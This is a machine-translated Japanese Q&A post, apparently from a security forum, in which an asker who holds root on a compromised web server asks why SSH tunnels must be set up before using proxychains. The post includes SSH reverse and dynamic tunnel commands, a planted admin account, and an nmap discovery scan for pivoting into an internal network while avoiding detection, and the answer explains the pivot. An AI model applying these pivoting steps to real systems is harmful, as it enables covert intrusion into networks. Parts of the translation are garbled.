SSHトンネリングにいくつかの設定が必要なときにProxyChainsを利用する場合、その理由は疑問に思います。

SSHトンネリングにいくつかの設定が必要なときにProxyChainsを利用する場合、その理由は疑問に思います。

提供情報:IP 1.1.1.1のシステムへのルートアクセス権があり、ポート22を開きます。

脆弱性を悪用し、コンピュータにアプリケーションをインストールせずに再度ログインしてrootアクセス権を取得するのではなく(コンピュータにリバースシェルを作成すると検出される可能性があります)、新しいアプローチと代理店を試してください。チェーン。

私の考えは、Webサーバーのトンネルを確立し、内部ネットワークマッピングを開始するために情報を渡すことです。偶然にプロキシチェーンを見つけましたが、confファイルで8080のようなポートを設定し、次のproxychains ifconfigコマンドを実行するのと同じくらい簡単です。 proxychains nmap --script=discovery $ip

プロキシチェーンを使用する前に完了する必要があるいくつかの構成があるようです。なぜ?。下記に添付いたします。

まず、Webサーバーのrootアクセス権でポート22を開き、次の管理者権限を持つユーザーを作成します。州立農場のジャック

その後、攻撃システムで次のことを行います。

ssh -f -N -R 2222:127.0.0.1:22 [email protected]
# Enter password for jakefromstatefarm
ssh -f -N -D 127.0.0.1:8080 -p 2222 [email protected]
# Enter password for atkMachineUser

次に、confファイルを編集してポート8080でプロキシチェーンを使用します。

proxychains ifconfig

私を混乱させる質問は、なぜこれらのトンネルグループを事前に設定する必要がありますか?他のシステムと通信するにはユーザー資格情報が必要なためですか?これにより、マシンは資格情報を維持し、プロキシチェーンは何も維持する必要がなくなります。

理論的には、ポート22を使用して1.1.1.1のWebサーバーと直接通信し、そのコマンドを実行するためにプロキシチェーンを設定できない理由がわからないため、混乱しています。

SSHトンネリングを正しく理解しようとしています。

私は多くの情報、wikiページ、書籍を読んでおり、いくつかの概念は漠然と理解していますが、まだ暖かく曖昧なアイデアはありません。ところが誰かが私が5歳の時のように、横説説を少なくするように説明してくれたら嬉しいと思います。

ベストアンサー1

SSHの説明

私が間違って理解した場合、誰かが割り込むかもしれませんが、これは私が理解する方法です。

リモートホストにリッスンポートを作成し、それをローカルにリダイレクトします。これにより、マシンがトラフィックをルーティングする場所を決定する必要がなくなり、後でルーティングを設定する必要がなくなります。したがって、リモートホストは、受信するトラフィックに基づいてどこに送信するかを決定します。

プロキシチェーンはトラフィックを8080に送信します。 - >リモート被害者のリスンポート2222にトラフィックを送信します。その後、そのホストのループバック22に戻ります。これで、ホストはトラフィックがどこに行くかを制御できます。そのため、このように調整する必要があります。

この方法を使用すると、被害者ホストにルーティング責任が与えられ、これがピボットが機能する方法です。

[攻撃者]8080 <--> 2222[被害者]<-->22[被害者:]

最初のステップをスキップすると、コンピュータは最終的にどのパスを選択するかを決定し、通常はユーザーを介して取得できるネットワークパスにトラフィックを送信したくない結果を提供します。セグメントルーティングホストの代わりにISPネットワークまたは一部のパブリックサーバーネットワークの反対側にあります。

[攻撃者]8080 <--> 22[被害者:]

おすすめ記事